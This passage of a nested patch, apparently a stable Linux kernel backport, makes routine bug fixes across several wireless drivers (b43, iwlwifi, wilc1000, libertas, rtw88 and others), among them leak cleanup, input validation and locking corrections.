+ 		wmi_event = skb_pull(skb, sizeof(struct wmi_cmd_hdr));
+@@ -169,10 +175,6 @@ void ath9k_wmi_event_tasklet(struct tasklet_struct *t)
+ 					     &wmi->drv_priv->fatal_work);
+ 			break;
+ 		case WMI_TXSTATUS_EVENTID:
+-			/* Check if ath9k_tx_init() completed. */
+-			if (!data_race(priv->tx.initialized))
+-				break;
+-
+ 			spin_lock_bh(&priv->tx.tx_lock);
+ 			if (priv->tx.flags & ATH9K_HTC_OP_TX_DRAIN) {
+ 				spin_unlock_bh(&priv->tx.tx_lock);
+diff --git a/drivers/net/wireless/broadcom/b43/b43.h b/drivers/net/wireless/broadcom/b43/b43.h
+index 67b4bac048e58..c0d8fc0b22fb2 100644
+--- a/drivers/net/wireless/broadcom/b43/b43.h
++++ b/drivers/net/wireless/broadcom/b43/b43.h
+@@ -1082,6 +1082,22 @@ static inline bool b43_using_pio_transfers(struct b43_wldev *dev)
+ 	return dev->__using_pio_transfers;
+ }
+ 
++static inline void b43_wake_queue(struct b43_wldev *dev, int queue_prio)
++{
++	if (dev->qos_enabled)
++		ieee80211_wake_queue(dev->wl->hw, queue_prio);
++	else
++		ieee80211_wake_queue(dev->wl->hw, 0);
++}
++
++static inline void b43_stop_queue(struct b43_wldev *dev, int queue_prio)
++{
++	if (dev->qos_enabled)
++		ieee80211_stop_queue(dev->wl->hw, queue_prio);
++	else
++		ieee80211_stop_queue(dev->wl->hw, 0);
++}
++
+ /* Message printing */
+ __printf(2, 3) void b43info(struct b43_wl *wl, const char *fmt, ...);
+ __printf(2, 3) void b43err(struct b43_wl *wl, const char *fmt, ...);
+diff --git a/drivers/net/wireless/broadcom/b43/dma.c b/drivers/net/wireless/broadcom/b43/dma.c
+index 9a7c62bd5e431..cfaf2f9d67b22 100644
+--- a/drivers/net/wireless/broadcom/b43/dma.c
++++ b/drivers/net/wireless/broadcom/b43/dma.c
+@@ -1399,7 +1399,7 @@ int b43_dma_tx(struct b43_wldev *dev, struct sk_buff *skb)
+ 	    should_inject_overflow(ring)) {
+ 		/* This TX ring is full. */
+ 		unsigned int skb_mapping = skb_get_queue_mapping(skb);
+-		ieee80211_stop_queue(dev->wl->hw, skb_mapping);
++		b43_stop_queue(dev, skb_mapping);
+ 		dev->wl->tx_queue_stopped[skb_mapping] = true;
+ 		ring->stopped = true;
+ 		if (b43_debug(dev, B43_DBG_DMAVERBOSE)) {
+@@ -1570,7 +1570,7 @@ void b43_dma_handle_txstatus(struct b43_wldev *dev,
+ 	} else {
+ 		/* If the driver queue is running wake the corresponding
+ 		 * mac80211 queue. */
+-		ieee80211_wake_queue(dev->wl->hw, ring->queue_prio);
++		b43_wake_queue(dev, ring->queue_prio);
+ 		if (b43_debug(dev, B43_DBG_DMAVERBOSE)) {
+ 			b43dbg(dev->wl, "Woke up TX ring %d\n", ring->index);
+ 		}
+diff --git a/drivers/net/wireless/broadcom/b43/main.c b/drivers/net/wireless/broadcom/b43/main.c
+index b2539a916fd04..bdfa68cc7ee2a 100644
+--- a/drivers/net/wireless/broadcom/b43/main.c
++++ b/drivers/net/wireless/broadcom/b43/main.c
+@@ -2587,7 +2587,8 @@ static void b43_request_firmware(struct work_struct *work)
+ 
+ start_ieee80211:
+ 	wl->hw->queues = B43_QOS_QUEUE_NUM;
+-	if (!modparam_qos || dev->fw.opensource)
++	if (!modparam_qos || dev->fw.opensource ||
++	    dev->dev->chip_id == BCMA_CHIP_ID_BCM4331)
+ 		wl->hw->queues = 1;
+ 
+ 	err = ieee80211_register_hw(wl->hw);
+@@ -3603,7 +3604,7 @@ static void b43_tx_work(struct work_struct *work)
+ 				err = b43_dma_tx(dev, skb);
+ 			if (err == -ENOSPC) {
+ 				wl->tx_queue_stopped[queue_num] = true;
+-				ieee80211_stop_queue(wl->hw, queue_num);
++				b43_stop_queue(dev, queue_num);
+ 				skb_queue_head(&wl->tx_queue[queue_num], skb);
+ 				break;
+ 			}
+@@ -3627,6 +3628,7 @@ static void b43_op_tx(struct ieee80211_hw *hw,
+ 		      struct sk_buff *skb)
+ {
+ 	struct b43_wl *wl = hw_to_b43_wl(hw);
++	u16 skb_queue_mapping;
+ 
+ 	if (unlikely(skb->len < 2 + 2 + 6)) {
+ 		/* Too short, this can't be a valid frame. */
+@@ -3635,12 +3637,12 @@ static void b43_op_tx(struct ieee80211_hw *hw,
+ 	}
+ 	B43_WARN_ON(skb_shinfo(skb)->nr_frags);
+ 
+-	skb_queue_tail(&wl->tx_queue[skb->queue_mapping], skb);
+-	if (!wl->tx_queue_stopped[skb->queue_mapping]) {
++	skb_queue_mapping = skb_get_queue_mapping(skb);
++	skb_queue_tail(&wl->tx_queue[skb_queue_mapping], skb);
++	if (!wl->tx_queue_stopped[skb_queue_mapping])
+ 		ieee80211_queue_work(wl->hw, &wl->tx_work);
+-	} else {
+-		ieee80211_stop_queue(wl->hw, skb->queue_mapping);
+-	}
++	else
++		b43_stop_queue(wl->current_dev, skb_queue_mapping);
+ }
+ 
+ static void b43_qos_params_upload(struct b43_wldev *dev,
+diff --git a/drivers/net/wireless/broadcom/b43/pio.c b/drivers/net/wireless/broadcom/b43/pio.c
+index 8c28a9250cd19..cc19b589fa70d 100644
+--- a/drivers/net/wireless/broadcom/b43/pio.c
++++ b/drivers/net/wireless/broadcom/b43/pio.c
+@@ -525,7 +525,7 @@ int b43_pio_tx(struct b43_wldev *dev, struct sk_buff *skb)
+ 	if (total_len > (q->buffer_size - q->buffer_used)) {
+ 		/* Not enough memory on the queue. */
+ 		err = -EBUSY;
+-		ieee80211_stop_queue(dev->wl->hw, skb_get_queue_mapping(skb));
++		b43_stop_queue(dev, skb_get_queue_mapping(skb));
+ 		q->stopped = true;
+ 		goto out;
+ 	}
+@@ -552,7 +552,7 @@ int b43_pio_tx(struct b43_wldev *dev, struct sk_buff *skb)
+ 	if (((q->buffer_size - q->buffer_used) < roundup(2 + 2 + 6, 4)) ||
+ 	    (q->free_packet_slots == 0)) {
+ 		/* The queue is full. */
+-		ieee80211_stop_queue(dev->wl->hw, skb_get_queue_mapping(skb));
++		b43_stop_queue(dev, skb_get_queue_mapping(skb));
+ 		q->stopped = true;
+ 	}
+ 
+@@ -587,7 +587,7 @@ void b43_pio_handle_txstatus(struct b43_wldev *dev,
+ 	list_add(&pack->list, &q->packets_list);
+ 
+ 	if (q->stopped) {
+-		ieee80211_wake_queue(dev->wl->hw, q->queue_prio);
++		b43_wake_queue(dev, q->queue_prio);
+ 		q->stopped = false;
+ 	}
+ }
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c
+index ccc621b8ed9f2..4a1fe982a948e 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy/phy_cmn.c
+@@ -383,8 +383,9 @@ struct shared_phy *wlc_phy_shared_attach(struct shared_phy_params *shp)
+ 	return sh;
+ }
+ 
+-static void wlc_phy_timercb_phycal(struct brcms_phy *pi)
++static void wlc_phy_timercb_phycal(void *ptr)
+ {
++	struct brcms_phy *pi = ptr;
+ 	uint delay = 5;
+ 
+ 	if (PHY_PERICAL_MPHASE_PENDING(pi)) {
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c
+index a0de5db0cd646..b723817915365 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.c
+@@ -57,12 +57,11 @@ void wlc_phy_shim_detach(struct phy_shim_info *physhim)
+ }
+ 
+ struct wlapi_timer *wlapi_init_timer(struct phy_shim_info *physhim,
+-				     void (*fn)(struct brcms_phy *pi),
++				     void (*fn)(void *pi),
+ 				     void *arg, const char *name)
+ {
+ 	return (struct wlapi_timer *)
+-			brcms_init_timer(physhim->wl, (void (*)(void *))fn,
+-					 arg, name);
++			brcms_init_timer(physhim->wl, fn, arg, name);
+ }
+ 
+ void wlapi_free_timer(struct wlapi_timer *t)
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h
+index dd8774717adee..27d0934e600ed 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmsmac/phy_shim.h
+@@ -131,7 +131,7 @@ void wlc_phy_shim_detach(struct phy_shim_info *physhim);
+ 
+ /* PHY to WL utility functions */
+ struct wlapi_timer *wlapi_init_timer(struct phy_shim_info *physhim,
+-				     void (*fn)(struct brcms_phy *pi),
++				     void (*fn)(void *pi),
+ 				     void *arg, const char *name);
+ void wlapi_free_timer(struct wlapi_timer *t);
+ void wlapi_add_timer(struct wlapi_timer *t, uint ms, int periodic);
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index f5fcc547de391..235963e1d7a9a 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -725,7 +725,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 	 * from index 1, so the maximum value allowed here is
+ 	 * ACPI_SAR_PROFILES_NUM - 1.
+ 	 */
+-	if (n_profiles <= 0 || n_profiles >= ACPI_SAR_PROFILE_NUM) {
++	if (n_profiles >= ACPI_SAR_PROFILE_NUM) {
+ 		ret = -EINVAL;
+ 		goto out_free;
+ 	}
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+index 5979d904bbbd2..677c9e0b46f10 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c
+@@ -103,6 +103,12 @@ static int iwl_dbg_tlv_alloc_debug_info(struct iwl_trans *trans,
+ 	if (le32_to_cpu(tlv->length) != sizeof(*debug_info))
+ 		return -EINVAL;
+ 
++	/* we use this as a string, ensure input was NUL terminated */
++	if (strnlen(debug_info->debug_cfg_name,
++		    sizeof(debug_info->debug_cfg_name)) ==
++			sizeof(debug_info->debug_cfg_name))
++		return -EINVAL;
++
+ 	IWL_DEBUG_FW(trans, "WRT: Loading debug cfg: %s\n",
+ 		     debug_info->debug_cfg_name);
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+index 2748459d12279..88f4f429d875c 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/d3.c
+@@ -461,12 +461,10 @@ static int iwl_mvm_wowlan_config_rsc_tsc(struct iwl_mvm *mvm,
+ 		struct wowlan_key_rsc_v5_data data = {};
+ 		int i;
+ 
+-		data.rsc = kmalloc(sizeof(*data.rsc), GFP_KERNEL);
++		data.rsc = kzalloc(sizeof(*data.rsc), GFP_KERNEL);
+ 		if (!data.rsc)
+ 			return -ENOMEM;
+ 
+-		memset(data.rsc, 0xff, sizeof(*data.rsc));
+-
+ 		for (i = 0; i < ARRAY_SIZE(data.rsc->mcast_key_id_map); i++)
+ 			data.rsc->mcast_key_id_map[i] =
+ 				IWL_MCAST_KEY_MAP_INVALID;
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index f268a31ce26d9..105f283b777d2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -299,6 +299,7 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 				u32 status,
+ 				struct ieee80211_rx_status *stats)
+ {
++	struct wireless_dev *wdev;
+ 	struct iwl_mvm_sta *mvmsta;
+ 	struct iwl_mvm_vif *mvmvif;
+ 	u8 keyid;
+@@ -320,9 +321,15 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 	if (!ieee80211_is_beacon(hdr->frame_control))
+ 		return 0;
+ 
++	if (!sta)
++		return -1;
++
++	mvmsta = iwl_mvm_sta_from_mac80211(sta);
++	mvmvif = iwl_mvm_vif_from_mac80211(mvmsta->vif);
++
+ 	/* key mismatch - will also report !MIC_OK but we shouldn't count it */
+ 	if (!(status & IWL_RX_MPDU_STATUS_KEY_VALID))
+-		return -1;
++		goto report;
+ 
+ 	/* good cases */
+ 	if (likely(status & IWL_RX_MPDU_STATUS_MIC_OK &&
+@@ -331,13 +338,6 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 		return 0;
+ 	}
+ 
+-	if (!sta)
+-		return -1;
+-
+-	mvmsta = iwl_mvm_sta_from_mac80211(sta);
+-
+-	mvmvif = iwl_mvm_vif_from_mac80211(mvmsta->vif);
+-
+ 	/*
+ 	 * both keys will have the same cipher and MIC length, use
+ 	 * whichever one is available
+@@ -346,11 +346,11 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 	if (!key) {
+ 		key = rcu_dereference(mvmvif->bcn_prot.keys[1]);
+ 		if (!key)
+-			return -1;
++			goto report;
+ 	}
+ 
+ 	if (len < key->icv_len + IEEE80211_GMAC_PN_LEN + 2)
+-		return -1;
++		goto report;
+ 
+ 	/* get the real key ID */
+ 	keyid = frame[len - key->icv_len - IEEE80211_GMAC_PN_LEN - 2];
+@@ -364,7 +364,7 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 			return -1;
+ 		key = rcu_dereference(mvmvif->bcn_prot.keys[keyid - 6]);
+ 		if (!key)
+-			return -1;
++			goto report;
+ 	}
+ 
+ 	/* Report status to mac80211 */
+@@ -372,6 +372,10 @@ static int iwl_mvm_rx_mgmt_prot(struct ieee80211_sta *sta,
+ 		ieee80211_key_mic_failure(key);
+ 	else if (status & IWL_RX_MPDU_STATUS_REPLAY_ERROR)
+ 		ieee80211_key_replay(key);
++report:
++	wdev = ieee80211_vif_to_wdev(mvmsta->vif);
++	if (wdev->netdev)
++		cfg80211_rx_unprot_mlme_mgmt(wdev->netdev, (void *)hdr, len);
+ 
+ 	return -1;
+ }
+diff --git a/drivers/net/wireless/marvell/libertas/cmd.c b/drivers/net/wireless/marvell/libertas/cmd.c
+index 104d2b6dc9af6..5a525da434c28 100644
+--- a/drivers/net/wireless/marvell/libertas/cmd.c
++++ b/drivers/net/wireless/marvell/libertas/cmd.c
+@@ -1132,7 +1132,7 @@ int lbs_allocate_cmd_buffer(struct lbs_private *priv)
+ 		if (!cmdarray[i].cmdbuf) {
+ 			lbs_deb_host("ALLOC_CMD_BUF: ptempvirtualaddr is NULL\n");
+ 			ret = -1;
+-			goto done;
++			goto free_cmd_array;
+ 		}
+ 	}
+ 
+@@ -1140,8 +1140,17 @@ int lbs_allocate_cmd_buffer(struct lbs_private *priv)
+ 		init_waitqueue_head(&cmdarray[i].cmdwait_q);
+ 		lbs_cleanup_and_insert_cmd(priv, &cmdarray[i]);
+ 	}
+-	ret = 0;
++	return 0;
+ 
++free_cmd_array:
++	for (i = 0; i < LBS_NUM_CMD_BUFFERS; i++) {
++		if (cmdarray[i].cmdbuf) {
++			kfree(cmdarray[i].cmdbuf);
++			cmdarray[i].cmdbuf = NULL;
++		}
++	}
++	kfree(priv->cmd_array);
++	priv->cmd_array = NULL;
+ done:
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/marvell/mwifiex/debugfs.c b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+index 63f232c723374..55ca5b287fe7f 100644
+--- a/drivers/net/wireless/marvell/mwifiex/debugfs.c
++++ b/drivers/net/wireless/marvell/mwifiex/debugfs.c
+@@ -964,9 +964,6 @@ mwifiex_dev_debugfs_init(struct mwifiex_private *priv)
+ 	priv->dfs_dev_dir = debugfs_create_dir(priv->netdev->name,
+ 					       mwifiex_dfs_dir);
+ 
+-	if (!priv->dfs_dev_dir)
+-		return;
+-
+ 	MWIFIEX_DFS_ADD_FILE(info);
+ 	MWIFIEX_DFS_ADD_FILE(debug);
+ 	MWIFIEX_DFS_ADD_FILE(getlog);
+diff --git a/drivers/net/wireless/microchip/wilc1000/cfg80211.c b/drivers/net/wireless/microchip/wilc1000/cfg80211.c
+index b545d93c6e374..6f3245a43aef1 100644
+--- a/drivers/net/wireless/microchip/wilc1000/cfg80211.c
++++ b/drivers/net/wireless/microchip/wilc1000/cfg80211.c
+@@ -1615,7 +1615,6 @@ static int del_virtual_intf(struct wiphy *wiphy, struct wireless_dev *wdev)
+ 	cfg80211_unregister_netdevice(vif->ndev);
+ 	vif->monitor_flag = 0;
+ 
+-	wilc_set_operation_mode(vif, 0, 0, 0);
+ 	mutex_lock(&wl->vif_mutex);
+ 	list_del_rcu(&vif->list);
+ 	wl->vif_num--;
+@@ -1810,15 +1809,24 @@ int wilc_cfg80211_init(struct wilc **wilc, struct device *dev, int io_type,
+ 	INIT_LIST_HEAD(&wl->rxq_head.list);
+ 	INIT_LIST_HEAD(&wl->vif_list);
+ 
++	wl->hif_workqueue = alloc_ordered_workqueue("%s", WQ_MEM_RECLAIM,
++						    wiphy_name(wl->wiphy));
++	if (!wl->hif_workqueue) {
++		ret = -ENOMEM;
++		goto free_cfg;
++	}
+ 	vif = wilc_netdev_ifc_init(wl, "wlan%d", WILC_STATION_MODE,
+ 				   NL80211_IFTYPE_STATION, false);
+ 	if (IS_ERR(vif)) {
+ 		ret = PTR_ERR(vif);
+-		goto free_cfg;
++		goto free_hq;
+ 	}
+ 
+ 	return 0;
+ 
++free_hq:
++	destroy_workqueue(wl->hif_workqueue);
++
+ free_cfg:
+ 	wilc_wlan_cfg_deinit(wl);
+ 
+diff --git a/drivers/net/wireless/microchip/wilc1000/hif.c b/drivers/net/wireless/microchip/wilc1000/hif.c
+index a1b75feec6edf..5eb02902e875a 100644
+--- a/drivers/net/wireless/microchip/wilc1000/hif.c
++++ b/drivers/net/wireless/microchip/wilc1000/hif.c
+@@ -374,38 +374,49 @@ static void handle_connect_timeout(struct work_struct *work)
+ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 				struct cfg80211_crypto_settings *crypto)
+ {
+-	struct wilc_join_bss_param *param;
+-	struct ieee80211_p2p_noa_attr noa_attr;
+-	u8 rates_len = 0;
+-	const u8 *tim_elm, *ssid_elm, *rates_ie, *supp_rates_ie;
++	const u8 *ies_data, *tim_elm, *ssid_elm, *rates_ie, *supp_rates_ie;
+ 	const u8 *ht_ie, *wpa_ie, *wmm_ie, *rsn_ie;
++	struct ieee80211_p2p_noa_attr noa_attr;
++	const struct cfg80211_bss_ies *ies;
++	struct wilc_join_bss_param *param;
++	u8 rates_len = 0, ies_len;
+ 	int ret;
+-	const struct cfg80211_bss_ies *ies = rcu_dereference(bss->ies);
+ 
+ 	param = kzalloc(sizeof(*param), GFP_KERNEL);
+ 	if (!param)
+ 		return NULL;
+ 
++	rcu_read_lock();
++	ies = rcu_dereference(bss->ies);
++	ies_data = kmemdup(ies->data, ies->len, GFP_ATOMIC);
++	if (!ies_data) {
++		rcu_read_unlock();
++		kfree(param);
++		return NULL;
++	}
++	ies_len = ies->len;
++	rcu_read_unlock();
++
+ 	param->beacon_period = cpu_to_le16(bss->beacon_interval);
+ 	param->cap_info = cpu_to_le16(bss->capability);
+ 	param->bss_type = WILC_FW_BSS_TYPE_INFRA;
+ 	param->ch = ieee80211_frequency_to_channel(bss->channel->center_freq);
+ 	ether_addr_copy(param->bssid, bss->bssid);
+ 
+-	ssid_elm = cfg80211_find_ie(WLAN_EID_SSID, ies->data, ies->len);
++	ssid_elm = cfg80211_find_ie(WLAN_EID_SSID, ies_data, ies_len);
+ 	if (ssid_elm) {
+ 		if (ssid_elm[1] <= IEEE80211_MAX_SSID_LEN)
+ 			memcpy(param->ssid, ssid_elm + 2, ssid_elm[1]);
+ 	}
+ 
+-	tim_elm = cfg80211_find_ie(WLAN_EID_TIM, ies->data, ies->len);
++	tim_elm = cfg80211_find_ie(WLAN_EID_TIM, ies_data, ies_len);
+ 	if (tim_elm && tim_elm[1] >= 2)
+ 		param->dtim_period = tim_elm[3];
+ 
+ 	memset(param->p_suites, 0xFF, 3);
+ 	memset(param->akm_suites, 0xFF, 3);
+ 
+-	rates_ie = cfg80211_find_ie(WLAN_EID_SUPP_RATES, ies->data, ies->len);
++	rates_ie = cfg80211_find_ie(WLAN_EID_SUPP_RATES, ies_data, ies_len);
+ 	if (rates_ie) {
+ 		rates_len = rates_ie[1];
+ 		if (rates_len > WILC_MAX_RATES_SUPPORTED)
+@@ -416,7 +427,7 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 
+ 	if (rates_len < WILC_MAX_RATES_SUPPORTED) {
+ 		supp_rates_ie = cfg80211_find_ie(WLAN_EID_EXT_SUPP_RATES,
+-						 ies->data, ies->len);
++						 ies_data, ies_len);
+ 		if (supp_rates_ie) {
+ 			u8 ext_rates = supp_rates_ie[1];
+ 
+@@ -431,11 +442,11 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 		}
+ 	}
+ 
+-	ht_ie = cfg80211_find_ie(WLAN_EID_HT_CAPABILITY, ies->data, ies->len);
++	ht_ie = cfg80211_find_ie(WLAN_EID_HT_CAPABILITY, ies_data, ies_len);
+ 	if (ht_ie)
+ 		param->ht_capable = true;
+ 
+-	ret = cfg80211_get_p2p_attr(ies->data, ies->len,
++	ret = cfg80211_get_p2p_attr(ies_data, ies_len,
+ 				    IEEE80211_P2P_ATTR_ABSENCE_NOTICE,
+ 				    (u8 *)&noa_attr, sizeof(noa_attr));
+ 	if (ret > 0) {
+@@ -459,7 +470,7 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 	}
+ 	wmm_ie = cfg80211_find_vendor_ie(WLAN_OUI_MICROSOFT,
+ 					 WLAN_OUI_TYPE_MICROSOFT_WMM,
+-					 ies->data, ies->len);
++					 ies_data, ies_len);
+ 	if (wmm_ie) {
+ 		struct ieee80211_wmm_param_ie *ie;
+ 
+@@ -474,13 +485,13 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 
+ 	wpa_ie = cfg80211_find_vendor_ie(WLAN_OUI_MICROSOFT,
+ 					 WLAN_OUI_TYPE_MICROSOFT_WPA,
+-					 ies->data, ies->len);
++					 ies_data, ies_len);
+ 	if (wpa_ie) {
+ 		param->mode_802_11i = 1;
+ 		param->rsn_found = true;
+ 	}
+ 
+-	rsn_ie = cfg80211_find_ie(WLAN_EID_RSN, ies->data, ies->len);
++	rsn_ie = cfg80211_find_ie(WLAN_EID_RSN, ies_data, ies_len);
+ 	if (rsn_ie) {
+ 		int rsn_ie_len = sizeof(struct element) + rsn_ie[1];
+ 		int offset = 8;
+@@ -514,6 +525,7 @@ void *wilc_parse_join_bss_param(struct cfg80211_bss *bss,
+ 			param->akm_suites[i] = crypto->akm_suites[i] & 0xFF;
+ 	}
+ 
++	kfree(ies_data);
+ 	return (void *)param;
+ }
+ 
+diff --git a/drivers/net/wireless/microchip/wilc1000/netdev.c b/drivers/net/wireless/microchip/wilc1000/netdev.c
+index e9f59de31b0b9..b714da48eaa17 100644
+--- a/drivers/net/wireless/microchip/wilc1000/netdev.c
++++ b/drivers/net/wireless/microchip/wilc1000/netdev.c
+@@ -878,8 +878,7 @@ static const struct net_device_ops wilc_netdev_ops = {
+ 
+ void wilc_netdev_cleanup(struct wilc *wilc)
+ {
+-	struct wilc_vif *vif;
+-	int srcu_idx, ifc_cnt = 0;
++	struct wilc_vif *vif, *vif_tmp;
+ 
+ 	if (!wilc)
+ 		return;
+@@ -889,32 +888,19 @@ void wilc_netdev_cleanup(struct wilc *wilc)
+ 		wilc->firmware = NULL;
+ 	}
+ 
+-	srcu_idx = srcu_read_lock(&wilc->srcu);
+-	list_for_each_entry_rcu(vif, &wilc->vif_list, list) {
++	list_for_each_entry_safe(vif, vif_tmp, &wilc->vif_list, list) {
++		mutex_lock(&wilc->vif_mutex);
++		list_del_rcu(&vif->list);
++		wilc->vif_num--;
++		mutex_unlock(&wilc->vif_mutex);
++		synchronize_srcu(&wilc->srcu);
+ 		if (vif->ndev)
+ 			unregister_netdev(vif->ndev);
+ 	}
+-	srcu_read_unlock(&wilc->srcu, srcu_idx);
+ 
+ 	wilc_wfi_deinit_mon_interface(wilc, false);
+ 	destroy_workqueue(wilc->hif_workqueue);
+ 
+-	while (ifc_cnt < WILC_NUM_CONCURRENT_IFC) {
+-		mutex_lock(&wilc->vif_mutex);
+-		if (wilc->vif_num <= 0) {
+-			mutex_unlock(&wilc->vif_mutex);
+-			break;
+-		}
+-		vif = wilc_get_wl_to_vif(wilc);
+-		if (!IS_ERR(vif))
+-			list_del_rcu(&vif->list);
+-
+-		wilc->vif_num--;
+-		mutex_unlock(&wilc->vif_mutex);
+-		synchronize_srcu(&wilc->srcu);
+-		ifc_cnt++;
+-	}
+-
+ 	wilc_wlan_cfg_deinit(wilc);
+ 	wlan_deinit_locks(wilc);
+ 	wiphy_unregister(wilc->wiphy);
+@@ -977,13 +963,6 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 		goto error;
+ 	}
+ 
+-	wl->hif_workqueue = alloc_ordered_workqueue("%s-wq", WQ_MEM_RECLAIM,
+-						    ndev->name);
+-	if (!wl->hif_workqueue) {
+-		ret = -ENOMEM;
+-		goto unregister_netdev;
+-	}
+-
+ 	ndev->needs_free_netdev = true;
+ 	vif->iftype = vif_type;
+ 	vif->idx = wilc_get_available_idx(wl);
+@@ -996,12 +975,11 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 
+ 	return vif;
+ 
+-unregister_netdev:
++error:
+ 	if (rtnl_locked)
+ 		cfg80211_unregister_netdevice(ndev);
+ 	else
+ 		unregister_netdev(ndev);
+-  error:
+ 	free_netdev(ndev);
+ 	return ERR_PTR(ret);
+ }
+diff --git a/drivers/net/wireless/microchip/wilc1000/spi.c b/drivers/net/wireless/microchip/wilc1000/spi.c
+index b0fc5e68feeca..5877e2c1fa0fc 100644
+--- a/drivers/net/wireless/microchip/wilc1000/spi.c
++++ b/drivers/net/wireless/microchip/wilc1000/spi.c
+@@ -191,11 +191,11 @@ static void wilc_wlan_power(struct wilc *wilc, bool on)
+ 		/* assert ENABLE: */
+ 		gpiod_set_value(gpios->enable, 1);
+ 		mdelay(5);
+-		/* assert RESET: */
+-		gpiod_set_value(gpios->reset, 1);
+-	} else {
+ 		/* deassert RESET: */
+ 		gpiod_set_value(gpios->reset, 0);
++	} else {
++		/* assert RESET: */
++		gpiod_set_value(gpios->reset, 1);
+ 		/* deassert ENABLE: */
+ 		gpiod_set_value(gpios->enable, 0);
+ 	}
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 6dd5ec1e4d8c3..ccac47dd781d6 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -6542,6 +6542,7 @@ static void rtl8xxxu_stop(struct ieee80211_hw *hw)
+ 	if (priv->usb_interrupts)
+ 		rtl8xxxu_write32(priv, REG_USB_HIMR, 0);
+ 
++	cancel_work_sync(&priv->c2hcmd_work);
+ 	cancel_delayed_work_sync(&priv->ra_watchdog);
+ 
+ 	rtl8xxxu_free_rx_resources(priv);
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 4c8164db4a9e4..81f3112923f1c 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -1989,8 +1989,6 @@ static int rtw_chip_board_info_setup(struct rtw_dev *rtwdev)
+ 	rtw_phy_setup_phy_cond(rtwdev, 0);
+ 
+ 	rtw_phy_init_tx_power(rtwdev);
+-	if (rfe_def->agc_btg_tbl)
+-		rtw_load_table(rtwdev, rfe_def->agc_btg_tbl);
+ 	rtw_load_table(rtwdev, rfe_def->phy_pg_tbl);
+ 	rtw_load_table(rtwdev, rfe_def->txpwr_lmt_tbl);
+ 	rtw_phy_tx_power_by_rate_config(hal);
+diff --git a/drivers/net/wireless/realtek/rtw88/phy.c b/drivers/net/wireless/realtek/rtw88/phy.c
+index bd7d05e080848..fde7b532bc07e 100644
+--- a/drivers/net/wireless/realtek/rtw88/phy.c
++++ b/drivers/net/wireless/realtek/rtw88/phy.c
+@@ -1761,12 +1761,15 @@ static void rtw_load_rfk_table(struct rtw_dev *rtwdev)
+ 
+ void rtw_phy_load_tables(struct rtw_dev *rtwdev)
+ {
++	const struct rtw_rfe_def *rfe_def = rtw_get_rfe_def(rtwdev);
+ 	const struct rtw_chip_info *chip = rtwdev->chip;
+ 	u8 rf_path;
+ 
+ 	rtw_load_table(rtwdev, chip->mac_tbl);
+ 	rtw_load_table(rtwdev, chip->bb_tbl);
+ 	rtw_load_table(rtwdev, chip->agc_tbl);
++	if (rfe_def->agc_btg_tbl)
++		rtw_load_table(rtwdev, rfe_def->agc_btg_tbl);
+ 	rtw_load_rfk_table(rtwdev);
+ 
